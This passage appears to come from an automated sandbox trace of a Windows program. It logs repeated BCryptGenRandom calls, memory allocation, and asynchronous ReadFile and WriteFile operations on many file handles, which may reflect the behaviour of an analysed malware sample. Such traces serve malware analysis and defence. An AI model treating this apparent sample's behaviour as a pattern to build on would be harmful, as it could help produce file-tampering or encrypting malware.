cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0205.934] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0205.935] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0205.935] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0205.935] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0205.935] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0205.935] free (_Block=0x3e305b8) [0205.935] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0205.935] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0205.936] free (_Block=0x1fa91d0) [0205.936] free (_Block=0x1fa2ed8) [0205.936] free (_Block=0x1fa90b8) [0205.936] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x619, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0205.936] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0205.936] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x1e0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0205.937] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0205.947] ReadFile (in: hFile=0x3cc, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x11c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0205.947] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0205.947] CloseHandle (hObject=0x3cc) returned 1 [0205.947] free (_Block=0x3df0008) [0205.947] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0205.967] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0205.967] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0205.967] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0205.967] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0205.968] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0205.968] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0205.968] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0205.968] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0205.968] free (_Block=0x3e305b8) [0205.968] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0205.968] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0205.969] free (_Block=0x1fa91d0) [0205.969] free (_Block=0x1fa2ed8) [0205.969] free (_Block=0x1fa90b8) [0205.969] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0205.969] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0205.969] WriteFile (in: hFile=0x3cc, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0205.969] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0206.014] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0206.014] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0206.014] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0206.014] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0206.015] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0206.015] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0206.015] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0206.015] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0206.015] free (_Block=0x3e305b8) [0206.015] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0206.015] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0206.016] free (_Block=0x1fa91d0) [0206.016] free (_Block=0x1fa2ed8) [0206.016] free (_Block=0x1fa90b8) [0206.016] WriteFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x619, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0206.016] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0206.033] ReadFile (in: hFile=0x308, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x16a, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0206.033] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0206.041] WriteFile (in: hFile=0x338, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0206.041] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0206.042] WriteFile (in: hFile=0x170, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x390, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0206.042] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0209.761] CloseHandle (hObject=0x2a8) returned 1 [0209.762] free (_Block=0x1ff1e60) [0209.762] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0210.056] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0210.056] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0210.056] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0210.056] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0210.057] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0210.057] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0210.057] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0210.057] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0210.057] free (_Block=0x3e305b8) [0210.057] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0210.057] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0210.058] free (_Block=0x1fa91d0) [0210.058] free (_Block=0x1fa2ed8) [0210.058] free (_Block=0x1fa90b8) [0210.058] WriteFile (in: hFile=0x2a8, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0x61a, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3ef0008) returned 1 [0210.059] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0210.081] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0210.082] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0210.082] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0210.082] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0210.082] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0210.082] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0210.085] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0210.085] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0210.085] free (_Block=0x3e305b8) [0210.085] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0210.085] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0210.086] free (_Block=0x1fa91d0) [0210.086] free (_Block=0x1fa2ed8) [0210.086] free (_Block=0x1fa90b8) [0210.086] WriteFile (in: hFile=0x338, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0x615, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0210.086] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0210.108] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0210.109] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0210.109] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0210.109] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0210.109] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0210.109] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0210.112] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0210.112] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0210.112] free (_Block=0x3e305b8) [0210.112] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0210.112] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0210.113] free (_Block=0x1fa91d0) [0210.113] free (_Block=0x1fa2ed8) [0210.113] free (_Block=0x1fa90b8) [0210.113] WriteFile (in: hFile=0x308, lpBuffer=0x3fb00ec*, nNumberOfBytesToWrite=0x61d, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3fb00b8 | out: lpBuffer=0x3fb00ec*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3fb00b8) returned 1 [0210.113] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0210.116] ReadFile (in: hFile=0xec, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x15e, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0210.116] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0210.159] WriteFile (in: hFile=0x238, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x3e0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0210.159] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0210.171] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0210.171] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0210.171] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0210.171] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0210.172] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0210.172] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0210.172] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0210.172] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0210.172] free (_Block=0x3e305b8) [0210.172] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0210.172] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0210.173] free (_Block=0x1fa91d0) [0210.173] free (_Block=0x1fa2ed8) [0210.173] free (_Block=0x1fa90b8) [0210.173] WriteFile (in: hFile=0x338, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0210.173] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0210.185] CloseHandle (hObject=0xec) returned 1 [0210.191] free (_Block=0x3df0008) [0210.191] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0210.194] CloseHandle (hObject=0x2a8) returned 1 [0210.195] free (_Block=0x3ef0008) [0210.195] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0210.228] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0210.229] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0210.229] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0210.229] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0210.229] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0210.229] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0210.230] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0210.230] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0210.230] free (_Block=0x3e305b8) [0210.230] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0210.230] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0210.230] free (_Block=0x1fa91d0) [0210.230] free (_Block=0x77d7a8) [0210.230] free (_Block=0x1fa90b8) [0210.230] WriteFile (in: hFile=0x238, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x613, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0210.231] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0210.240] ReadFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x11a, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0210.240] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0210.263] WriteFile (in: hFile=0x338, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x120, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0210.264] GetQueuedCompletionStatus (CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff) Thread: id = 12 os_tid = 0x8c4 [0069.071] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0082.036] CloseHandle (hObject=0x3c0) returned 1 [0082.036] free (_Block=0x3df0008) [0082.036] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0082.038] CloseHandle (hObject=0x3b8) returned 1 [0082.038] free (_Block=0x3e30078) [0082.044] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0082.153] ReadFile (in: hFile=0x3c4, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0x390c4, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 1 [0082.163] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0082.172] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0082.173] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0082.173] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2fafc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2fafc30) returned 0x0 [0082.173] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0082.173] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0082.173] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2faf970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2faf970) returned 0x0 [0082.177] calloc (_Count=0x40, _Size=0x4) returned 0x77d800 [0082.177] calloc (_Count=0x41, _Size=0x4) returned 0x77d908 [0082.177] free (_Block=0x77d800) [0082.177] calloc (_Count=0x41, _Size=0x4) returned 0x3db00b8 [0082.177] calloc (_Count=0x82, _Size=0x4) returned 0x3db01c8 [0082.177] free (_Block=0x3db00b8) [0082.177] free (_Block=0x3db01c8) [0082.177] free (_Block=0x77d908) [0082.177] WriteFile (in: hFile=0x3b8, lpBuffer=0x2031f04, nNumberOfBytesToWrite=0x619, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2031ed0 | out: lpBuffer=0x2031f04, lpNumberOfBytesWritten=0x0, lpOverlapped=0x2031ed0) returned 0x0 [0082.178] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0082.235] CloseHandle (hObject=0x3b8) returned 1 [0082.235] free (_Block=0x2031ed0) [0082.235] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0082.250] ReadFile (in: hFile=0x3c4, lpBuffer=0x3d7007c, nNumberOfBytesToRead=0x13e0, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048 | out: lpBuffer=0x3d7007c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70048) returned 1 [0082.258] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0082.259] WriteFile (in: hFile=0x3ac, lpBuffer=0x3db00ec*, nNumberOfBytesToWrite=0xc40, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3db00b8 | out: lpBuffer=0x3db00ec*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3db00b8) returned 1 [0082.259] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0082.337] WriteFile (in: hFile=0x3b4, lpBuffer=0x1ff1e94, nNumberOfBytesToWrite=0xc30, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0082.337] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0082.385] CloseHandle (hObject=0x3ac) returned 1 [0082.385] free (_Block=0x1fb18c0) [0082.385] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0082.429] CloseHandle (hObject=0x3c0) returned 1 [0082.431] free (_Block=0x3db00b8) [0082.431] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2fafc0c, lpCompletionKey=0x2fafc1c, lpOverlapped=0x2fafc18) returned 1 [0082.434] ReadFile (in: hFile=0x3ac, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x13e0, lpNumberOfBytesRead=0x0, 